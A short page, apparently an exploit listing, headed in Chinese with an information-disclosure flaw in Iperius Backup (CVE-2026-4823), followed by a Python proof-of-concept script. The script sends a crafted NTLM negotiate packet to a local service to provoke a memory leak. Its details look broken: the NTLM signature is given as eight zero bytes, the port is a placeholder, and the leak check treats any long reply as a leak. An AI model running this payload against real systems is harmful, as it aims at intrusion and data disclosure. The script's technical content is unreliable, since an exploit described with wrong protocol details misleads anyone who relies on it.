CVE-2026-4823 Iperius Backup信息泄露漏洞

# PoC Concept for CVE-2026-4823 (Local Information Disclosure) # This script is a conceptual demonstration of triggering the NTLM2 Handler flaw. # Note: Actual exploitation requires local access and specific environment conditions. import socket import struct import sys def send_malicious_ntlm_packet(target_ip, target_port): """ Sends a crafted packet to the local Iperius Backup service to trigger the information disclosure in NTLM2 Handler. """ try: print(f"[*] Connecting to {target_ip}:{target_port}...") # Establish a connection to the local vulnerable service sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) # Craft a malformed NTLM negotiation message # This payload is designed to trigger the buffer read overflow # leading to memory leak. payload = b"\x00" * 8 # Signature payload += b"\x01" * 4 # Message Type (Negotiate) payload += b"\xFF" * 4 # Flags (Malformed) payload += b"A" * 1024 # Padding to trigger read boundary issue print("[*] Sending malicious payload...") sock.sendall(payload) # Receive response response = sock.recv(4096) if response: print("[+] Response received:") print(response) # Check for leaked memory patterns (e.g., pointers, strings) if b"\x00\x00\x00\x00" in response or len(response) > 100: print("[!] Potential memory leak detected!") else: print("[-] No obvious leak detected in this attempt.") else: print("[-] No response from server.") sock.close() except Exception as e: print(f"[!] Error during exploitation: {e}") if __name__ == "__main__": # Target is localhost as this is a Local (AV:L) vulnerability TARGET_IP = "127.0.0.1" TARGET_PORT = 0000 # Replace with actual service port if known if len(sys.argv) > 1: TARGET_PORT = int(sys.argv[1]) else: print("Usage: python poc.py <port>") print("Attempting with default placeholder port...") send_malicious_ntlm_packet(TARGET_IP, TARGET_PORT)